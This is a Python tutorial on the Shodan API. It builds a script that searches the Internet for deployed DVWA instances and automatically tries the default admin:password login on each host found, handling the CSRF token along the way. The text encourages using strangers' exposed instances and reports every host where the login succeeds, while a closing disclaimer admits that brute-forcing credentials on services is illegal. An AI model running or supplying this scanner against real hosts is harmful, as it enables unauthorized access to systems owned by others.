Public IP addresses are routable on the Internet, which means any host with a public IP can be reached by any other Internet-connected host, provided no firewall filters the traffic. Because IPv4 is still the dominant protocol on the Internet and its address space is small enough to enumerate, crawling the whole Internet is now both possible and practical.
Several platforms offer Internet scanning as a service, including Shodan, Censys, and ZoomEye. Using these services, we can search the Internet for devices running a given service and find surveillance cameras, industrial control systems (such as those used in power plants), servers, IoT devices, and much more.
These services often offer an API, which lets programmers take full advantage of their scan results. Product managers use them to check how widely patches have been applied and to get a big-picture view of market share relative to competitors, and security researchers use them to find vulnerable hosts and report on the impact of vulnerabilities.
In this tutorial, we will look into Shodan's API using Python and some of its practical use-cases.
Shodan is by far the most popular IoT search engine. It was created in 2009 and features a web interface for manually exploring data, as well as a REST API and libraries for the most popular programming languages, including Python, Ruby, Java, and C#.
Using most of Shodan's features requires a Shodan membership, which costs $49 for a lifetime upgrade at the time of writing and is free for students, professors, and IT staff. Refer to this page for more information.
Once you become a member, you can manually explore data. Let's try to find unprotected Axis security cameras:
As you can see, the search engine is quite powerful, especially with search filters. If you want to test more cool queries, we'd recommend checking out this list of awesome Shodan search queries.
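Search filters take the form name:value and can be combined with free text in a single query. As a minimal sketch, the hypothetical helper below (build_query is not part of the Shodan library) assembles such a query string. The filter names in the example (title, country, port) are commonly documented Shodan filters, but check the filter reference for what your plan supports.

```python
def build_query(text="", **filters):
    """Assemble a Shodan-style query string from free text and name:value filters.

    Hypothetical helper for illustration; not part of the shodan library.
    """
    parts = [text] if text else []
    for name, value in filters.items():
        value = str(value)
        # Quote values containing spaces so they stay attached to their filter
        if " " in value:
            value = f'"{value}"'
        parts.append(f"{name}:{value}")
    return " ".join(parts)


print(build_query(title="dvwa"))
print(build_query("axis", country="US", port=80))
```

The resulting string can be pasted into the web interface or passed to the search call used later in this tutorial.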
Now let's try the Shodan API. First, we navigate to our account to retrieve our API key:
To get started with Python, we need to install the shodan library:
pip3 install shodan
The example we'll use in this tutorial is a script that searches for instances of DVWA (Damn Vulnerable Web Application) that still have default credentials and reports them.
DVWA is an open-source project made for security testing. It's a web application that is vulnerable by design, and users are expected to deploy it on their own machines. We will try to find instances on the Internet that are already deployed, so we can use them without installing anything.
There are many ways to search for DVWA instances, but we'll stick with the page title, as it's straightforward:
The difficulty with doing this task manually is that most instances should have had their login credentials changed. So, to find accessible DVWA instances, we need to try the default credentials on each detected instance. We'll do that with Python:
import shodan
import time
import requests
import re
# your shodan API key
SHODAN_API_KEY = '<YOUR_SHODAN_API_KEY_HERE>'
api = shodan.Shodan(SHODAN_API_KEY)
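Hardcoding the key works for a quick test, but it is easy to leak when sharing the script. One alternative, sketched below, reads the key from an environment variable. The variable name SHODAN_API_KEY and the helper load_api_key are choices made for this example, not something the shodan library requires.

```python
import os


def load_api_key(env_var="SHODAN_API_KEY"):
    """Return the API key stored in the given environment variable.

    Hypothetical helper; the variable name is an assumption for this sketch.
    """
    key = os.environ.get(env_var, "").strip()
    if not key:
        raise RuntimeError(f"Set the {env_var} environment variable first")
    return key


# Usage, assuming the variable is set in your shell:
# api = shodan.Shodan(load_api_key())
```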
Now let's write a function that queries a page of results from Shodan. One page can contain up to 100 results, and we add a loop for safety: in case of a network or API error, we keep retrying with 5-second delays until it works:
# requests a page of data from shodan
def request_page_from_shodan(query, page=1):
    while True:
        try:
            instances = api.search(query, page=page)
            return instances
        except shodan.APIError as e:
            print(f"Error: {e}")
            time.sleep(5)
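Retrying forever can hang the script if the error is permanent, such as an invalid API key. A possible variation, shown as a sketch, caps the number of attempts and doubles the delay after each failure. The helper retry_with_backoff and its parameters are hypothetical. It takes any zero-argument callable, so it is shown here without the Shodan client.

```python
import time


def retry_with_backoff(func, exceptions=(Exception,), max_attempts=5,
                       base_delay=1.0, sleep=time.sleep):
    """Call func() until it succeeds or max_attempts is reached.

    Hypothetical helper: the delay doubles after every failed attempt,
    and the last exception is re-raised once attempts are exhausted.
    """
    for attempt in range(1, max_attempts + 1):
        try:
            return func()
        except exceptions as e:
            if attempt == max_attempts:
                raise
            delay = base_delay * 2 ** (attempt - 1)
            print(f"Error: {e}, retrying in {delay} seconds")
            sleep(delay)


# Usage with the client from this tutorial (not executed here):
# page = retry_with_backoff(lambda: api.search("title:dvwa", page=1),
#                           exceptions=(shodan.APIError,))
```

The sleep parameter exists only so the delay can be swapped out, for instance when testing the helper without waiting.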
Let's define a function that takes a host and checks if the credentials admin:password (defaults for DVWA) are valid; this is independent of the Shodan library. We will use the requests library for submitting our credentials and checking the result:
# Try the default credentials on a given instance of DVWA, simulating a real user:
# visit the login.php page to get the CSRF token, then try to log in with admin:password
def has_valid_credentials(instance):
    sess = requests.Session()
    # treat the host as HTTPS when the Shodan result carries an 'ssl' field
    proto = 'https' if 'ssl' in instance else 'http'
    url = f"{proto}://{instance['ip_str']}:{instance['port']}/login.php"
    try:
        res = sess.get(url, verify=False)
    except requests.exceptions.ConnectionError:
        return False
    if res.status_code != 200:
        print(f"[-] Got HTTP status code {res.status_code}, expected 200")
        return False
    # search the CSRF token using regex
    match = re.search(r"user_token' value='([0-9a-f]+)'", res.text)
    if match is None:
        # no token found, so this is probably not a DVWA login page
        return False
    token = match.group(1)
    res = sess.post(
        url,
        f"username=admin&password=password&user_token={token}&Login=Login",
        allow_redirects=False,
        verify=False,
        headers={'Content-Type': 'application/x-www-form-urlencoded'}
    )
    # A redirect to index.php means the authentication succeeded;
    # .get() avoids a KeyError when there is no Location header
    return res.status_code == 302 and res.headers.get('Location') == 'index.php'
The above function sends a GET request to the DVWA login page to retrieve the user_token. Then, it sends a POST request with the default username, password, and the CSRF token, and checks whether the authentication was successful.
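The token extraction step can be tried in isolation, without any network access. In the sketch below, the HTML snippet is a made-up sample shaped to match the regular expression used above, and extract_user_token is a hypothetical helper that returns None instead of raising when no token is present.

```python
import re

# Same pattern as in has_valid_credentials()
TOKEN_PATTERN = re.compile(r"user_token' value='([0-9a-f]+)'")


def extract_user_token(html):
    """Return the CSRF token found in the page, or None if there is none."""
    match = TOKEN_PATTERN.search(html)
    return match.group(1) if match else None


# Made-up sample markup for illustration only
sample = "<input type='hidden' name='user_token' value='3f2a9c0d1e' />"
print(extract_user_token(sample))
print(extract_user_token("<html>no form here</html>"))
```

Returning None lets the caller skip hosts whose title matched the search but whose login page is not a DVWA form.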
Let's write a function that takes a query and iterates over the pages in Shodan search results, and for each host on each page, we call the has_valid_credentials() function:
# Takes a page of results, and scans each of them, running has_valid_credentials
def process_page(page):
    result = []
    for instance in page['matches']:
        if has_valid_credentials(instance):
            print(f"[+] valid credentials at : {instance['ip_str']}:{instance['port']}")
            result.append(instance)
    return result
# searches on shodan using the given query, and iterates over each page of the results
def query_shodan(query):
    print("[*] querying the first page")
    first_page = request_page_from_shodan(query)
    total = first_page['total']
    already_processed = len(first_page['matches'])
    result = process_page(first_page)
    page_number = 2
    while already_processed < total:
        # break just in your testing, API queries have monthly limits;
        # remove this line to go through every page
        break
        print(f"querying page {page_number}")
        # keep the page data in its own variable so the page counter is not overwritten
        page = request_page_from_shodan(query, page=page_number)
        if not page['matches']:
            # stop on an empty page, otherwise the loop would never end
            break
        already_processed += len(page['matches'])
        result += process_page(page)
        page_number += 1
    return result
# search for DVWA instances
res = query_shodan('title:dvwa')
print(res)
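Because API queries have monthly limits, it can help to cap how many pages a single run may fetch. The generator below is one way to sketch that: iter_pages and its max_pages parameter are hypothetical, and fetch_page stands in for any function with the same shape as request_page_from_shodan(), returning a dictionary with 'total' and 'matches' keys.

```python
def iter_pages(fetch_page, query, max_pages=3):
    """Yield result pages for query, stopping at max_pages or when results run out.

    fetch_page(query, page=n) is expected to return a dict with
    'total' and 'matches' keys (an assumption matching the code above).
    """
    seen = 0
    for page_number in range(1, max_pages + 1):
        page = fetch_page(query, page=page_number)
        matches = page['matches']
        if not matches:
            break
        yield page
        seen += len(matches)
        if seen >= page['total']:
            break


# Stand-in for the real API: 5 made-up results served 2 per page
def fake_fetch(query, page=1):
    data = [{'ip_str': f"192.0.2.{i}", 'port': 80} for i in range(5)]
    start = (page - 1) * 2
    return {'total': len(data), 'matches': data[start:start + 2]}


for page in iter_pages(fake_fetch, 'title:dvwa', max_pages=2):
    print(len(page['matches']))
```

With the real client, the loop body would pass each page to process_page(), for example by iterating over iter_pages(request_page_from_shodan, 'title:dvwa').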
This can be improved significantly by using multi-threading to speed up the scan, since hosts can be checked in parallel. Check this tutorial, which may help you out.
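As a rough sketch of that idea, the standard library's concurrent.futures.ThreadPoolExecutor can run the check on several hosts at once. The helper check_hosts_concurrently and the max_workers value are assumptions for this example. In the script above, check_host would be has_valid_credentials(); here it is replaced by a stand-in so the snippet runs without network access.

```python
from concurrent.futures import ThreadPoolExecutor


def check_hosts_concurrently(instances, check_host, max_workers=10):
    """Run check_host on every instance in parallel and keep those that pass."""
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        # executor.map preserves the input order of instances
        results = list(executor.map(check_host, instances))
    return [inst for inst, ok in zip(instances, results) if ok]


# Stand-in check: pretend only hosts on port 80 have default credentials
def fake_check(instance):
    return instance['port'] == 80


# Made-up hosts using documentation-reserved IP addresses
hosts = [
    {'ip_str': '192.0.2.1', 'port': 80},
    {'ip_str': '192.0.2.2', 'port': 8080},
    {'ip_str': '192.0.2.3', 'port': 80},
]
print(check_hosts_concurrently(hosts, fake_check))
```

Threads suit this task because each check spends most of its time waiting on the network rather than computing.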
Here is the script output:
As you can see, this Python script works and reports hosts that have the default credentials on DVWA instances.
Scanning for DVWA instances with default credentials might not be the most useful example, as the application is made to be vulnerable by design, and most people using it are not changing their credentials.
However, the Shodan API is very powerful, and the example above highlights how it's possible to iterate over scan results and process each of them with code. The search API is the most popular, but Shodan also supports on-demand scanning, network monitoring, and more. You can check out the API reference for more details.
Disclaimer: We do not encourage illegal activities. With great power comes great responsibility. Using Shodan is not illegal, but brute-forcing credentials on routers and services is, and we are not responsible for any misuse of the API or the Python code we provided.
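To illustrate that kind of processing, here is a small sketch that tallies matches by port with collections.Counter. The sample dictionaries are made up and only carry the ip_str and port fields already used in this tutorial; count_by_port is a hypothetical helper.

```python
from collections import Counter


def count_by_port(matches):
    """Count how many results were found on each port."""
    return Counter(match['port'] for match in matches)


# Made-up results using documentation-reserved IP addresses
sample_matches = [
    {'ip_str': '192.0.2.10', 'port': 80},
    {'ip_str': '192.0.2.11', 'port': 443},
    {'ip_str': '192.0.2.12', 'port': 80},
]
for port, count in count_by_port(sample_matches).most_common():
    print(f"port {port}: {count} host(s)")
```

The same function could be applied to the 'matches' list of any page returned by the search call.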
Check the full code here.
Finally, in our Ethical Hacking with Python Ebook, we've built 35+ hacking tools from scratch using Python. Make sure to check it out here if you're interested!
Happy Hacking ♥